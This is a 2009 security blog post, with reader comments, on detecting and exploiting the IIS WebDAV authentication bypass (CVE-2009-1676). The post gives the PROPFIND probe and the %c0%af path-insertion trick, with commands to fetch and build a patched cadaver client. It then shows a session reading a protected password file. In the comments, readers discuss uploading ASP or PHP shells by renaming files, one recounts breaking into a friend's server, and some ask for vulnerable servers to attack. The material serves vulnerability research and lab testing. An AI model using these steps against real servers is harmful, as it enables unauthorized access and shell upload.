WebDAV Detection, Vulnerability Checking and Exploitation

Ahoy! My name is Andrew and I've been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676) and helping Ron with writing the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today so I thought I'd jump in where he left off and post a bit about how to detect if WebDAV is enabled and how to actually exploit a folder once you've determined it is vulnerable.

The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is _not_ protected then it's time to break out the funky cold medina and have some fun.

Detecting if WebDAV is enabled

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4

On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.

My method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:

Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>

When WebDAV is enabled, it should return "HTTP/1.1 207 Multi-Status".

When WebDAV has been disabled, it should return "HTTP/1.1 501 Not Supported".

This is the method I've implemented in the http-iis-webdav-vuln.nse script. It works great in the lab on IIS servers. If we get back anything other than a 207 or 501 then we jump ship saying the web server is not supported. An Ubuntu server running Apache returns a 405 Method Not Allowed for instance.

Checking if a server is vulnerable

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the %c0%af character after the first /. It would turn /secret/ into /%c0%afsecret/.

This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af character can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/.

Finding a vulnerable server

Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2

Tested not working on
* IIS 5.0/Windows 2000 SP4

Now for the fun part. If you havent turned on some funky cold medina yet, get to it because we're almost done!

First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today btw). Lets see how an nmap scan of this box with the updated script works out:

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.

Exploiting it!

Now we could do everything by telnet-ing over port 80, but that's not much fun (believe me, it's very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client but I quickly realized it has a bunch of problems that won't let us do what we wanted. The nice thing about FOSS is that it's open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for awhile, we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:

1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work)
2) Append the header "Translate: f" to every request (otherwise get and probably others won't work)
3) Insert the characters "%c0%af" into any uri request longer than 1 character.

So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here's the commands:

> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
> tar xzvf cadaver-0.23.2.tar.gz
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
> make

Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a "dav:/>" prompt. Now just cd into the vulnerable folder and check out what's there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':

And there you have it!

Here's a list of commands that I've tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS

Oddly enough, the COPY command does NOT work. We didn't have time to investigate why, but the functionality can be duplicated by a get/local rename/put.

Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), so don't try.

If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we've been trying and can't get it to work in the lab here.

Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca

49 thoughts on “WebDAV Detection, Vulnerability Checking and Exploitation

  1. Reply


    Isn't it also possible to check if a server has webdav enabled by sending this?

    OPTIONS * HTTP/1.0

    1. Reply


      Hi Goku,

      OPTIONS can detect if it's enabled, but OPTIONS can be disabled (and it's best practise to do so -- I expect that most corporate environments disable it). Our method doesn't rely on OPTIONS, but seems to be totally reliable.

      We're planning on using OPTIONS as a backup plan if the '/' folder is password protected, though. At least then we'll have something.

  2. Reply


    I can't scan with nmap. I'm using backtrack, Backtrack haven't nsedebug. how to install it

  3. Reply

    Andrew Post author

    Goku: That method does not seem to work reliably. It seems there is a way to disable support for a HTTP OPTIONS request on IIS 6.0. See http://seclists.org/nmap-dev/2009/q2/0417.html for more info. That being said, it would be a great idea to add it as a fallback for when the PROPFIND method doesn't work.

  4. Reply



    check out the last post regarding nmap for detailed instructions. You can perform an svn update with BT3/4. You can also just reinstall over top, but that's not as helpful and can cause a few problems.

    quick solution:
    $ mkdir nmapbeta/
    $ svn co --username guest --password \\ svn://svn.insecure.org/nmap/ nmapbeta/

    $cd nmapbeta; ./configure; make
    $ ./nmap --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx


  5. Reply


    Hello Matt, my Y!M(YAhoo messenger) is : lotches
    MSN : lotches@live.com
    Can you talk about this bug ?

  6. Reply


    Sometime i got error : |_ http-iis-webdav-vuln: ERROR: Couldn't find folders.lst (should be in nselib/d ata)

  7. Reply


    I tried it on IIS 6.0 on our lab.
    It was configured like that:
    we created a vhost based on a folder browsable by everyone, which contains some txt files accessible only by administrator.

    I can browse the folder and its content with a common browser, but when I try to list its content using your patched cadaver, it returns no files, like the folder is empty.

    Moreover trying to bypass auth mechanism using unicode attack doesn't work either :(

    I followed exactly your tutorial I suppose. Any clues?


  8. Reply



    just hit the last post before this. That should give you the detailed information to solve these issues.

  9. Reply



    it is because you dont have folders.lst in the location you mentioned (nselib/data).

    I guess you have to create a new one containing the names of folders you want to bruteforce

  10. Reply

    Andrew Post author


    I'm getting the same results in our lab. I can also browse the contents with a common browser and see there is a file there, but using cadaver (patched and not patched) it does not show the file. Getting the file works (with the patched cadaver), but I'll take a look in a little bit and see what the browser is doing differently than cadaver and try to replicate that in the cadaver patch.

    Thanks for the info!

  11. Reply


    @rangepeacock : Can you share me some server, i have been searching it but i can't find it :((

  12. Reply


    @Math : i saw but i want talk with you.Nice to chat with you

    1. Reply


      Hi Lotches,

      The instructions are all available in this thread, especially in Matt's post -- I don't think we can do much more to help you.


  13. Reply


    sorry, we are using vmware in LAN.


    besides cadaver issue, I cannot get the attack working, regardless the position of the unicode inside the string!
    Looks like one does not simply unicode his way into mordor!

  14. Reply


    I've successfully been able to upload a phpfile to a webdav server with authentication.
    When I then try to do a GET request to execute the phpshell I get the source code instead.

    So actually it ain't possible to execute system commands.

    Correct me if I'm wrong.


  15. Reply


    i can upload file in the server but i can not upload asp or aspx file,maybe ur server ???

  16. Reply


    You have to upload it as a txt file. Then afterwards rename it to .asp

  17. Reply


    No,i can't,i think server dont accept upload or rename to asp file

    dav:/> move 1.txt 1.asp
    Moving `/1.txt' to `/1.asp': failed:
    http://xxxxx.net/1.asp: 403 Forbidden


  18. Reply


    Some do some don't.

  19. Reply


    i got this error can someone give me the answer :(

    wishnu@stupid:~/nmapbeta$ ./nmap --script=http-iis-webdav-vuln
    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-25 00:24 WIT
    NSE: failed to initialize the script engine:
    ./nse_main.lua:199: ./http-iis-webdav-vuln.nse:1: '=' expected near '/'
    stack traceback:
    [C]: in function 'assert'
    ./nse_main.lua:199: in function 'new'
    ./nse_main.lua:348: in function 'Entry'
    ./scripts/script.db:16: in function 'db_closure'
    ./nse_main.lua:361: in function 'get_chosen_scripts'
    ./nse_main.lua:504: in main chunk
    [C]: ?


    1. Reply


      Hi wishnu,

      I don't know exactly what your problem is, but try running this command first:
      export NMAPDIR=.

      That'll tell Nmap to use the current directory for its datafiles, not the system directory. It's important to run that before you run Nmap from a non-system folder.

      Hope that helps! If not, I suggest posting to the nmap-dev mailing list.

  20. Reply


    what about over SSL? how can i enable ssl?

    1. Reply


      Hi zoot,

      Unfortunately, I don't think the tool we modified supports SSL at all...


  21. Reply


    Thanks man, works great, just today i was on faculty of Informatics and electrotechnics on my university, meet old friend there with Microsoft Server in his office and he challenged me to break into. In less than 10 seconds the work was done an i won a beer :) Cheers

    1. Reply


      @MI1: I think that means you owe us half a beer! ;)

  22. Reply


    anderson@ubuntu:~/cadever-h4x/cadaver-0.23.2$ ./cadaver
    dav:/> cd secret
    Could not access /secret/ (not WebDAV-enabled?):
    Did not find a collection resource.
    dav:/> ls -al
    Listing collection `/-al/': collection is empty.
    finish secessful ?
    I can't command server

  23. Reply


    Not find resoucre
    Plese help me
    > patch -p1 < ../cadaver-0.23.2-h4x.patch
    patching file lib/neon/ne_basic.c
    patching file lib/neon/ne_request.c
    patching file lib/neon/ne_uri.c


    1. Reply


      @anderson: it looks like you're doing it righyt, but that either WebDAV isn't enabled or the folder denies permission to list contents, even with WebDAV.

      The only thing I notice is, don't do "ls -al", Cadaver doesn't understand that, just do "ls".

  24. Reply


    i found cadaver-ssl-0.22.2-1012
    im wondering if its possible to patch this one? im werkin on it trying to patch it but im not sure about the version...

    1. Reply


      @zo0t: It *might* work, I don't really see why it wouldn't.. let me know how it goes :)

  25. Reply


    i succeeded install it thanks for ur help my friends... o i forgot my name is wishnu from indonesia :D..... nice to meet u all

  26. Reply


    I can't get the put method work..

    dav:/webdav/> get readme.txt
    Downloading `/webdav/readme.txt' to readme.txt:
    Progress: [=============================>] 100.0% of 27 bytes succeeded.

    dav:/webdav/> put readme.txt
    Uploading readme.txt to `/webdav/readme.txt':
    Progress: [=============================>] 100.0% of 27 bytes failed:
    403 Forbidden

    dav:/webdav/> cat readme.txt
    Displaying `/webdav/readme.txt':
    U r not supposed to read me

    Is there a special configuration in the virtua directory to have?

    Thanks in advance.

  27. Reply


    Further investigations allowed me to write to the webdav folder only if write permission was enabled.
    Is it correct or put method works with read only permission too?

  28. Reply


    On two three test cases (all sites I tried) the vulnerability did not work. The scanner found the folders as vulnerable

    cadaver and issuing the request manually gave either a 404 , or an IIS permissions error. the anonymous user for the site had rights to the private folders. this was iis6.0 and 5.0 with webdav enabled.

    sounds like this vulnerability even works on less configurations or something

  29. Reply


    This vulnerability is valid to smtp iis

  30. Reply



    I've just written a translation about this excellent article. I hope there's no problem (I posted a link to the article). Here's the translation:


    See you!

    1. Reply


      @Cortex: Very cool!

      Although I didn't technically write the blog (Andrew did), I don't have any issue with a translation. :)

  31. Reply

    Andrew Post author

    @cortex: Awesome, the only Spanish I know is 'cerveza por favor', nice work!

  32. Reply


    Hey, i need help with nmap. When i wanna scan for vuln WebDav:

    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-08 09:55 Central Europe D
    aylight Time
    NSE: failed to initialize the script engine:
    C:\WINDOWS\system32\nse_main.lua:370: 'http-iis-webdav-vuln' did not match a cat
    egory, filename, or directory
    stack traceback:
    [C]: in function 'error'
    C:\WINDOWS\system32\nse_main.lua:370: in function 'get_chosen_scripts'
    C:\WINDOWS\system32\nse_main.lua:503: in main chunk
    [C]: ?


    Please help

  33. Reply


    I have the same trouble!↑
    sorry,my bad english!

  34. Reply


    Hey, when I try to "make" the cadaver application I get an error, well, a list of errors rather talking about how libintl.h is missing and it can't use the "gettext" command or something.

    Any help?

  35. Reply



    Im have trouble using cadaver, is it easy to use Metasploit to do the exploit. Can you share some methods in doing it?

  36. Reply


    dav:/> cat default.asp
    Displaying `/default.asp':
    Failed: 403 Forbidden

    How to display it ? i got a same problem with another file in another IIS. Thanks

  37. Reply


    hi! i coult get or cat any ASP file, but i can view CSS file. how to get or cat ASP file, thank

  38. Reply


    thank you man :)

  39. Reply


    If Apache returns a 405 does this mean webdav is or isn't enabled?

  40. Reply


    If Apache returns a 405 does this mean webdav is or isn't enabled? Is there a version of this script ported for testing Apache?

  41. Reply


    How can we confirm for the webdav on apache server?

Leave a Reply

Your email address will not be published.